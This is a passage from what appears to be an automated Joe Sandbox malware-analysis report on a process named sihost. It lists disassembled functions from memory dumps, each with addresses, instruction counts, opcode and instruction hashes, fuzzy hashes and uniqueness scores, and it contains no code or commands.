              • Opcode Fuzzy Hash: f605c352bcc5e1257da6ad8ece8fdd11322a29d7206cb350acc10c5843a70ea1
              • Instruction Fuzzy Hash: 8B018BB1C1964E8EEB95AE38C9492FE3FE0EF14301F00153AE818C2091DB31A5988A40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4332A Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 36d84858cc16ae20c055d26c349b4ed8c82bf2c9ca9e6470ca81a59e2d01d36d
              • Instruction ID: b84d7216a62ab1cd75ab480d9d542aa5c87e4047cfd029ff94d78de20b04793f
              • Opcode Fuzzy Hash: 36d84858cc16ae20c055d26c349b4ed8c82bf2c9ca9e6470ca81a59e2d01d36d
              • Instruction Fuzzy Hash: 17012CB0D2851E9EEB91EB78C58C1B97AE5FF58301F644976E818C2161EE35E1488740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4273D Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 346758cccd4b58da1da95f480bc120b50111ea81d4afb7671b48c3ae63f4fda1
              • Instruction ID: b042938399d1150ea6e96a3d3c154a7c0c7df26c0f8ee645135ac938282521b8
              • Opcode Fuzzy Hash: 346758cccd4b58da1da95f480bc120b50111ea81d4afb7671b48c3ae63f4fda1
              • Instruction Fuzzy Hash: C301A2B491E64E8FE752EB74C98C1B9BBE0FF59300F4144B6D908C70A2EE35E4488741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4A629 Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b5d6ac6a3ef27bc90597d35d16b2b7024a203be61882a42befe1b8103fddc15f
              • Instruction ID: 950054648a39531bb3387abbf6ce2da256aa435c0fe03502db5ff0a002b17780
              • Opcode Fuzzy Hash: b5d6ac6a3ef27bc90597d35d16b2b7024a203be61882a42befe1b8103fddc15f
              • Instruction Fuzzy Hash: 0F0171B095E6894FE752EB34C99D1A97BF0EF59300F0509F7D808C70A2DE29E4888B11
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF408EF Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 56838506fcca9e6aaca1a10941be71afd00ef8110404660fb83205d8c29d5907
              • Instruction ID: 6c162289a656ec067ba692f02a1a8b8446708c6bd88cf0e1cdf68efc3baaa5c1
              • Opcode Fuzzy Hash: 56838506fcca9e6aaca1a10941be71afd00ef8110404660fb83205d8c29d5907
              • Instruction Fuzzy Hash: 270121B2C0890D4EEF49EB34C48AAE9B7A1FF68310F054175C54AD7193CE34B88A8B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF40200 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0aa30b00e9ac1ecc8ae2ae355f40c5346133c7d04913c4e72c79249570173e1e
              • Instruction ID: eaab0922fb5b3b175df4cbcbeff4f2a39b5621cf0f57ea6f86297daadc75d027
              • Opcode Fuzzy Hash: 0aa30b00e9ac1ecc8ae2ae355f40c5346133c7d04913c4e72c79249570173e1e
              • Instruction Fuzzy Hash: 340169B4819A0E8AEB59EB74C4982BD77A0FF58305F50087EE80EC6192DF36A595CA10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF40208 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ece4dacdfa7048a372160d475295a1b42a99e368230740824098bd8d66e06963
              • Instruction ID: d1372edf4c089a391c6a8e95af857113ae914a7802ace1799fe091eeae9e710b
              • Opcode Fuzzy Hash: ece4dacdfa7048a372160d475295a1b42a99e368230740824098bd8d66e06963
              • Instruction Fuzzy Hash: E0018CB4819A1E8FEB59EF74C49D2BA77A0FF18304F50087EE80EC2191DF36A158CA10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF40D20 Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a755d3f066fe7d7f20889dc2f4d11dcded874e28df1f5c8ada42dfcdf4a28edc
              • Instruction ID: befc673ad9c6f3be83c681535a5e912d588a5b46d19ab5abc37ac0004c830a0d
              • Opcode Fuzzy Hash: a755d3f066fe7d7f20889dc2f4d11dcded874e28df1f5c8ada42dfcdf4a28edc
              • Instruction Fuzzy Hash: 8CF0FFB1C2954E8AEBA6AA78E88C3FDBBB0FB15314F00157AD80DC1481CF76619C8241
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF417BD Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 62cb887066b472371f5332ec8db87fd39afd260c2b1000182e9732ce17cfba6f
              • Instruction ID: af22ef4cb25f0e11bae35cd3ff1fab67512e68c43b0a9523ba52da82ab42f0bd
              • Opcode Fuzzy Hash: 62cb887066b472371f5332ec8db87fd39afd260c2b1000182e9732ce17cfba6f
              • Instruction Fuzzy Hash: 5001D1B088968D8FDF95DF38C4992FA3BE0FF55301F8040BAE808C2092DA76D854C780
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF401C8 Relevance: .0, Instructions: 39COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 33f31f8832e434362f0d647f82cd7396bdb21fee14eef7e8c11f379fde3c8a24
              • Instruction ID: a65ed04a7793ec241076e3a2aea99a2e47fb8b55e02297bbeaea96e76912936b
              • Opcode Fuzzy Hash: 33f31f8832e434362f0d647f82cd7396bdb21fee14eef7e8c11f379fde3c8a24
              • Instruction Fuzzy Hash: ACF0AFB088950E8FEF95EF38D4892FA37A4EF55304F40443AE80DC2081DA36E494CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF43234 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7dea5375164b9e146b3b8318de47762e4049e9d62905096a90bf7f7937b3f000
              • Instruction ID: 76d52821afd41d5a25eef099f03103c024246882db4a6cadbb4715b4d88b06ca
              • Opcode Fuzzy Hash: 7dea5375164b9e146b3b8318de47762e4049e9d62905096a90bf7f7937b3f000
              • Instruction Fuzzy Hash: 77F0E1F5D19619CFEB59DA78C5D96FC7BB1AF94310F10403AD809922C1CA39568CDB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42659 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 83fdc2ac328319df0421fddc2ea30e7fa6fa05632efbc48394608d4a249ef28e
              • Instruction ID: 5544a70de6320979588812ced50ff605ab437df03765648c3201b762e55fef1a
              • Opcode Fuzzy Hash: 83fdc2ac328319df0421fddc2ea30e7fa6fa05632efbc48394608d4a249ef28e
              • Instruction Fuzzy Hash: FBF062B480E3898FEB5A9B3488691A93FB0BF16205F8504BEE849C61D3DB699558C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4AD58 Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: edf77b5a3500bacd1f2009760430716fb7b61386b5c93bd346ad8d189f70a426
              • Instruction ID: 69ef5cbac8662931d4da1ae7bd9a61d1ce510cee68b0c28085cef7b9af4d7d61
              • Opcode Fuzzy Hash: edf77b5a3500bacd1f2009760430716fb7b61386b5c93bd346ad8d189f70a426
              • Instruction Fuzzy Hash: E7F081B094A51D8EEB56DB28C489BE9B3B0FF59300F5042B9C40DD3151CA35A9858F40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF426CD Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 22f94ecb9ea6dde58dccc8b351f08548c3734e544b52d7d232985c7db37c858b
              • Instruction ID: 0cf026b48649fa2e03fef3d8eb9c3d82c19b4bc5fe5c4757eba8c55c5646c0b2
              • Opcode Fuzzy Hash: 22f94ecb9ea6dde58dccc8b351f08548c3734e544b52d7d232985c7db37c858b
              • Instruction Fuzzy Hash: 27F0F6B481A38E4FE76A9F34C8592B93BA0FF05300F4004BAE809C50D2EF799458C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF481D1 Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 03bb6bac109673238ac0bd7e332f322e5649525490829f6df55759c91dee82ac
              • Instruction ID: 3657fdf9c6f8bae62d6774ccacfd76deb53043143e9dbe5d6de02c566ffe7fbd
              • Opcode Fuzzy Hash: 03bb6bac109673238ac0bd7e332f322e5649525490829f6df55759c91dee82ac
              • Instruction Fuzzy Hash: 2BF031F0D0965A8FDBA6CB28C9847F977F4AF09301F1001E5D44D92242CA395AC98F44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF46E0B Relevance: .0, Instructions: 26COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2655c7a9d774592f9c0c9260772b17175a5828b649b39d1685a2ff811732c35e
              • Instruction ID: cbc743d61b3abc16daa3ae51547ec30bfe050070eb389db9d91fa395479d47f1
              • Opcode Fuzzy Hash: 2655c7a9d774592f9c0c9260772b17175a5828b649b39d1685a2ff811732c35e
              • Instruction Fuzzy Hash: 27F0FEF0D0961A8FDBA5DB28C984BE9B7F4EB18300F1001E5950DD3242DA349BC58F44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4BA62 Relevance: .0, Instructions: 18COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fb2babfa1bda7b68a17206cef28127223f6adfd7d1d6f673f2e0dd0ee535421f
              • Instruction ID: 89d0a15272a068c9c40df508dee5c013a0ca31bae671daa8e28b7a92383d951f
              • Opcode Fuzzy Hash: fb2babfa1bda7b68a17206cef28127223f6adfd7d1d6f673f2e0dd0ee535421f
              • Instruction Fuzzy Hash: 9FD06CB5D1896ECFDF95EFE8D9846EDB3B4FB28301B001126E81DE3641DB31A8248B40
              Uniqueness

              Uniqueness Score: -1.00%

              Executed Functions

              Function 00007FFBACF5EE6E Relevance: 5.1, Strings: 4, Instructions: 73COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID: !$3$A$]
              • API String ID: 0-874543953
              • Opcode ID: d4b80564fd83c159c72babb7ff7a1e04cff120a13bb6c107ae44b6e28d44e25c
              • Instruction ID: 829fa5b58a21c0d1a6d7bc51055bb461339f591380c0e68e554b51a056c8ada0
              • Opcode Fuzzy Hash: d4b80564fd83c159c72babb7ff7a1e04cff120a13bb6c107ae44b6e28d44e25c
              • Instruction Fuzzy Hash: 26311AF0D0962E8BDBA9DF24C8997E9B7B1EB55310F0041E9D54DA7281CB39AE84CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5EC8D Relevance: 5.1, Strings: 4, Instructions: 60COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID: #$3$A$[
              • API String ID: 0-1255984973
              • Opcode ID: a37206e20d52f971ac97dd02c63f82fb893cd65e170a8574971376d14ecc365b
              • Instruction ID: 6efdd5c2cd6fa58c65e93bdfbe84f1df1de606faae0a35114e33684be73ea32f
              • Opcode Fuzzy Hash: a37206e20d52f971ac97dd02c63f82fb893cd65e170a8574971376d14ecc365b
              • Instruction Fuzzy Hash: 2C21D8F0D0962D8BEB69DF24C8557E977B1BB59300F0041A9D90DA6285CB79AE84CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5F4DA Relevance: 2.7, Strings: 2, Instructions: 156COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID: H$M
              • API String ID: 0-2018367969
              • Opcode ID: a18ae63900cb5fa45f974c48517233210e7ca8f3a0c58e91169d45c0757d7bcb
              • Instruction ID: 89a1cbdae39613c046ddde55afdf1a4d948633a17c41dbab54e7a21d04efae4c
              • Opcode Fuzzy Hash: a18ae63900cb5fa45f974c48517233210e7ca8f3a0c58e91169d45c0757d7bcb
              • Instruction Fuzzy Hash: F85119B0D09A2D8FDBA4DB28C8557E9B7B1FB58301F4041EAC60DE3281DE35AE858F45
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5C3AD Relevance: 1.4, Strings: 1, Instructions: 173COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID: $K~
              • API String ID: 0-2883342327
              • Opcode ID: fb22a40168fe8e2fe25445855b6489f1feebf9b65a37e3d17963fac6582b8cd8
              • Instruction ID: b8adda4ed07b67ae669014b52f7bf6114d88758b46d237046ca05be07b3492bf
              • Opcode Fuzzy Hash: fb22a40168fe8e2fe25445855b6489f1feebf9b65a37e3d17963fac6582b8cd8
              • Instruction Fuzzy Hash: 1E4181A7D18A2E4AEB51BB7DF4050FE77D0DF85331F000537D689C5492DB29B88A8AA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5F384 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID: H
              • API String ID: 0-2852464175
              • Opcode ID: cd8f9399a6df529a29c7bc354ef0385e6cb72e90ca2a0412e49b91c85bb53d60
              • Instruction ID: 368eefbe04d494f26d461ff4e7345bc5dd6558552090cb2d6a1744f1a4c86ebb
              • Opcode Fuzzy Hash: cd8f9399a6df529a29c7bc354ef0385e6cb72e90ca2a0412e49b91c85bb53d60
              • Instruction Fuzzy Hash: E6411DF1D14A1D8BDBA8DB28C8557E8B7B1EF58301F4041EAD60DE3282CE356E868F55
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5C4AB Relevance: 1.4, Strings: 1, Instructions: 105COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID: }\_^
              • API String ID: 0-1816612321
              • Opcode ID: 964b72ee0f27e3977f3f40b5343bcba08c41a79d57870d7febc7c1c552e7574a
              • Instruction ID: b99d01a8170cb8e9cc9004a22e4e9c397443abb1e4b950148bb812326d7588f0
              • Opcode Fuzzy Hash: 964b72ee0f27e3977f3f40b5343bcba08c41a79d57870d7febc7c1c552e7574a
              • Instruction Fuzzy Hash: E73196E6D0952E4AEB46BBBDE4190FD7BD0DF59331F000036DB1AC5092DF25A88ACA94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5D159 Relevance: .4, Instructions: 394COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ac7fadad6fc371ca148f2a7ad6ec1fab575a3fd32d75a1838dcf3fd5a5802832
              • Instruction ID: 7bcce2ac579c59e00016d5b17828ed68e038f46dc0f59a1abe8c90b5e30a9537
              • Opcode Fuzzy Hash: ac7fadad6fc371ca148f2a7ad6ec1fab575a3fd32d75a1838dcf3fd5a5802832
              • Instruction Fuzzy Hash: C2E18BB1D1A65D8FEB99DB68C4597BCBBB1FF58300F0000BAD00ED7692CA35A885DB51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5BCE9 Relevance: .2, Instructions: 215COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 46ce465c3fa9df3fea9c00e615f6b9eca49b1628710a5a3bf4207b762c4d0984
              • Instruction ID: 9bda3c54cdf00f28297db0234d95fde04e5d4a13ed29d1be3604e81a58d45fa2
              • Opcode Fuzzy Hash: 46ce465c3fa9df3fea9c00e615f6b9eca49b1628710a5a3bf4207b762c4d0984
              • Instruction Fuzzy Hash: 3A7106B0E0991D8FEB95EB78C4596ECB7F1FF59300F5001BAD509E7292DA35A9448B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5351F Relevance: .2, Instructions: 214COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9e72a8b2720251013af0e09c3654e1bc562b7c77c6bc9f9ddeb1508bf7b3ef70
              • Instruction ID: 3a651de02f7031a99a92f24804024034cb4709666de798e678b5fc7580cdb8d1
              • Opcode Fuzzy Hash: 9e72a8b2720251013af0e09c3654e1bc562b7c77c6bc9f9ddeb1508bf7b3ef70
              • Instruction Fuzzy Hash: 2471C3B2E2894D8FEB85DBACE8597BC7BE1FF4A310F40017AC10DC3696DA651805CB42
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF52035 Relevance: .1, Instructions: 142COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 27c1891667d9092a36012207ffdf989cae51fc34aef92dbd727881fce5f0f818
              • Instruction ID: fded8ffa3fab3f35570d27c508033b562fca28048c774e7d0560824bb7400dc9
              • Opcode Fuzzy Hash: 27c1891667d9092a36012207ffdf989cae51fc34aef92dbd727881fce5f0f818
              • Instruction Fuzzy Hash: F44124B190E64E4FE746DB38D4591B97BE1EF45300F0502BAD90DC31A3DE29EC4A8341
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF518F4 Relevance: .1, Instructions: 138COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: de91a8a6e3e04d9bf5cc17878b613857adfe1cfd6a8e1b1386c98b2ad6258ec5
              • Instruction ID: 894517ce0b6cb0059383e0aac081e1e86fceefea73d838e35011d0d99204d67a
              • Opcode Fuzzy Hash: de91a8a6e3e04d9bf5cc17878b613857adfe1cfd6a8e1b1386c98b2ad6258ec5
              • Instruction Fuzzy Hash: 1141A3B0B187498BCB4DDE28C89647A77E1FF98714B14857DD58BC3296CE35E842CB81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5C450 Relevance: .1, Instructions: 133COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d38a142e8306bbae2d204027e38614ee0382e8f5b100f7a8498ee656439b488f
              • Instruction ID: cf82ce7faba8bff29fe170f85f63f455a4812fec18c943f59787aa520ea32d93
              • Opcode Fuzzy Hash: d38a142e8306bbae2d204027e38614ee0382e8f5b100f7a8498ee656439b488f
              • Instruction Fuzzy Hash: C3418AF6D1951E4AEB51BBBDE4090FD7BD0DF55321F000536DA09C5096DF25B88ACAA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF530F5 Relevance: .1, Instructions: 117COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 164dcd76464890d347c86dbb0b55281039fe1bc0cdde29922f7d8424b8859b25
              • Instruction ID: 2dbe7e7ce1aaa4ebc0c701808e815c599f8dc697b531c40220ee4f44879f37d7
              • Opcode Fuzzy Hash: 164dcd76464890d347c86dbb0b55281039fe1bc0cdde29922f7d8424b8859b25
              • Instruction Fuzzy Hash: E4416DF0D0A50E8FEB55DBB8C4586FD77F1EF45301F01013AD909E6282DA3AA94D8B51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5CE29 Relevance: .1, Instructions: 113COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a11a6ec3ecb736d802594aeccf846007da9a2aa160c024ff2c760664c6ac1c56
              • Instruction ID: 37f4d99426518ba3668ebfddaf6df78d032111c04ad6dd16a361beddc9fd77ae
              • Opcode Fuzzy Hash: a11a6ec3ecb736d802594aeccf846007da9a2aa160c024ff2c760664c6ac1c56
              • Instruction Fuzzy Hash: 184127B0D0965D8FDB51DFB8C4486EDB7F0EF19311F10417AE909E7292DA39A948CB60
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF503FD Relevance: .1, Instructions: 106COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 05c13ecc07e330ea6a2c2e888f7d0b96aa9489a0e21631b5334c32c29eddb33b
              • Instruction ID: 3c027d6c8254f50bf61c8d477aa908234ad9bb238ec21eb3f30704ca1ab08d98
              • Opcode Fuzzy Hash: 05c13ecc07e330ea6a2c2e888f7d0b96aa9489a0e21631b5334c32c29eddb33b
              • Instruction Fuzzy Hash: 7C31F6A790E69D4FE352A73CD8591F97FE0EF52221B0501F3D688CA093DD15AC4DC661
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF522C7 Relevance: .1, Instructions: 94COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a32b3e0b368ed2f043c69e242d5b26d0150ac8c8116c2396d858f99cd914da46
